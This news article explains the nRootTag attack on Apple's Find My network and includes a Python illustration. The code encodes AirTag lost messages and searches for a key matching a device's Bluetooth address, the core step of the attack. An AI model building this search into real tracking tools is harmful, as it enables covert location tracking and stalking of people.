New Attack “nRootTag” Turns 1.5 Billion iPhones into Free Tracking Agents


A new attack dubbed nRootTag turns over 1.5 billion Apple devices, including iPhones, iPads, Apple Watches, and Macs, into unwitting relays that let malicious actors covertly track other people's devices.

To be detailed in a forthcoming USENIX Security Symposium 2025 paper by researchers Junming Chen, Xiaoyue Ma, Lannan Luo, and Qiang Zeng, the attack abuses Apple’s Find My network to turn non-Apple devices into stealthy tracking beacons without requiring root access.

The exploit, which rides on Bluetooth Low Energy (BLE) advertising, poses a privacy risk at a scale not seen before.

How nRootTag Hijacks Apple’s Find My Network

Apple’s Find My network, designed to locate lost devices using crowdsourced Bluetooth sightings by nearby Apple products, relies on BLE “lost messages” broadcast by AirTags. Each message carries a public key; a nearby device encrypts its own location to that key and relays the report to Apple’s cloud, where only the holder of the matching private key (normally the owner) can retrieve and decrypt it.

The nRootTag attack bypasses this system’s safeguards by spoofing legitimate AirTag broadcasts.

The attack begins with trojanized code installed on a target device, such as a Windows PC, Android phone, or Linux-based IoT gadget. 

This code reads the device’s BLE advertising address (which it cannot change without root) and requests from an attacker-controlled server a public/private key pair that matches that address. Once configured, the device broadcasts forged “lost messages” indistinguishable from genuine AirTag signals. 

Attack overview

Nearby Apple devices, acting as unwitting “finders,” relay these messages to Apple’s servers, and the attacker, holding the private key, pulls the reports back down to track the device’s real-time location.

The researchers developed two methods to obtain a key pair that matches a given BLE address: rainbow table precomputation and on-the-fly GPU-assisted key search.

Architecture of nRootTag

A precomputed rainbow table allows near-instant key retrieval, while GPUs such as NVIDIA’s RTX 3080 or the data-center-grade A100 can search keys at rates exceeding 2.1 million keys per second. 

This efficiency brings the cost down to “under $5 per target” while achieving a 90% success rate within minutes.
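The passages above describe a key “matching” a BLE address and two ways of finding one. The following added example (written for this page, not code from the paper or from Apple) shows why such a match is needed: in a Find My lost message the first six bytes of the P‑224 public key are transmitted as the BLE address itself, and the finder rebuilds the key from address plus payload before encrypting its location to it. The byte layout follows the publicly documented OpenHaystack reconstruction of the AirTag advertisement and is an assumption the page does not spell out; the curve constants are the NIST P‑224 parameters from FIPS 186‑4; the arithmetic is a plain affine double-and-add for readability, not constant-time, and the “table” is a dictionary standing in for the paper’s rainbow table. The target address is constructed inside the block from a known private key so the search can be checked offline.

```python
"""Find My lost-message encoding and the key-for-address search behind nRootTag.
Added illustration; not the researchers' or Apple's code."""
import hashlib

# NIST P-224 domain parameters (FIPS 186-4). Find My keys live on this curve.
P = 2**224 - 2**96 + 1
A = P - 3
B = 0xB4050A850C04B3ABF54132565044B0B7D7BFD8BA270B39432355FFB4
G = (0xB70E0CBD6BB4BF7F321390B94A03C1D356C21122343280D6115C1D21,
     0xBD376388B5F723FB4C22DFE6CD4375A05A07476444D5819985007E34)
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFF16A2E0B8F03E13DD29455C5C2A3D


def on_curve(pt):
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine point addition; None is the point at infinity. Demo only, not constant-time."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, P - 2, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, P - 2, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k, pt):
    """Double-and-add scalar multiplication."""
    result, addend = None, pt
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def pubkey_x(priv):
    """Find My advertises only the 28-byte x-coordinate of the public key."""
    return scalar_mult(priv, G)[0].to_bytes(28, "big")


def lost_message(pub_x, status=0x00):
    """Split the key the way an AirTag does (OpenHaystack layout, assumed):
    bytes 0..5 become the BLE address with the top two bits forced to 0b11
    (random static address), bytes 6..27 go into the manufacturer-specific
    payload, and the two displaced key bits ride in payload byte 29."""
    addr = bytes([pub_x[0] | 0xC0]) + pub_x[1:6]
    payload = (bytes([0x1E, 0xFF, 0x4C, 0x00, 0x12, 0x19, status])
               + pub_x[6:28] + bytes([pub_x[0] >> 6, 0x00]))
    return addr, payload


def finder_reconstruct(addr, payload):
    """What a nearby iPhone does before encrypting its location to the key."""
    first = (addr[0] & 0x3F) | (payload[29] << 6)
    return bytes([first]) + addr[1:6] + payload[7:29]


def report_id(pub_x):
    """Location reports are indexed by SHA-256 of the advertised key; whoever
    holds the private key (here the attacker's server) queries the same hash."""
    return hashlib.sha256(pub_x).hexdigest()


def key_matches_address(pub_x, addr):
    """The nRootTag constraint: a non-root trojan cannot change the BLE address,
    so the key's first six bytes (46 bits, since the top two travel in byte 29)
    must already equal the address the device advertises with."""
    return lost_message(pub_x)[0] == addr


def build_table(start_priv, count):
    """Precomputed lookup address -> private key. The paper's rainbow table is the
    space-optimised form of this idea; this dict is the illustrative stand-in."""
    table, pt = {}, scalar_mult(start_priv, G)
    for i in range(count):
        table[lost_message(pt[0].to_bytes(28, "big"))[0]] = start_priv + i
        pt = point_add(pt, G)  # one point addition per candidate, no full scalar mult
    return table


def search_key_for_address(addr, start_priv, max_trials):
    """On-the-fly search (the GPU variant runs this in parallel). Returns the
    private key whose public x-coordinate yields `addr`, or None if not hit."""
    pt = scalar_mult(start_priv, G)
    for i in range(max_trials):
        if key_matches_address(pt[0].to_bytes(28, "big"), addr):
            return start_priv + i
        pt = point_add(pt, G)
    return None


if __name__ == "__main__":
    # Constructed target: pretend the trojan reported the address that key 2500 would produce.
    device_addr = lost_message(pubkey_x(2500))[0]
    print("device address:", device_addr.hex(":"))
    print("table hit:", build_table(2000, 1000).get(device_addr))
    print("search hit:", search_key_for_address(device_addr, 1, 4000))
    print("report id:", report_id(pubkey_x(2500)))
```

The constructed target sits 2,500 keys from the search start, so the scan finds it in well under a second; against a real address the attacker has no such hint, which is exactly why the researchers need precomputation or GPU throughput to make the match affordable.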

Notably, the exploit’s cross-platform reach extends to smartwatches, laptops, and medical IoT devices, which widens the pool of devices that can be turned into beacons. 

Patches and Persistent Risks

Apple has released fixes in iOS 18.2, macOS Sequoia 15.2, and corresponding updates for its other platforms to mitigate nRootTag. 

However, the fix only stops patched Apple devices from relaying the forged signals. With over 1.5 billion active devices globally, many running outdated software, the attack remains viable. “As long as unpatched iPhones exist nearby, the tracking chain persists,” the paper notes.

The study, funded by the NSF and the Commonwealth Cyber Initiative, urges enterprises to segment Bluetooth traffic and enforce strict device authentication. 

For consumers, immediate software updates are critical. Yet, the researchers caution that nRootTag’s low cost and scalability make it “inevitable for cybercriminal adoption.”

nRootTag underscores systemic flaws in crowdsourced tracking networks. By exploiting trust in Apple’s ecosystem, the attack erodes anonymity guarantees and demonstrates how benign infrastructure can be weaponized. 

As Bluetooth-enabled devices proliferate, the study calls for re-evaluating offline finding systems’ cryptographic designs—before malicious tracking becomes endemic.

Apple has not commented beyond acknowledging the researchers’ disclosure. With the exploit’s blueprint now public, the fight to safeguard billions of devices has just begun.



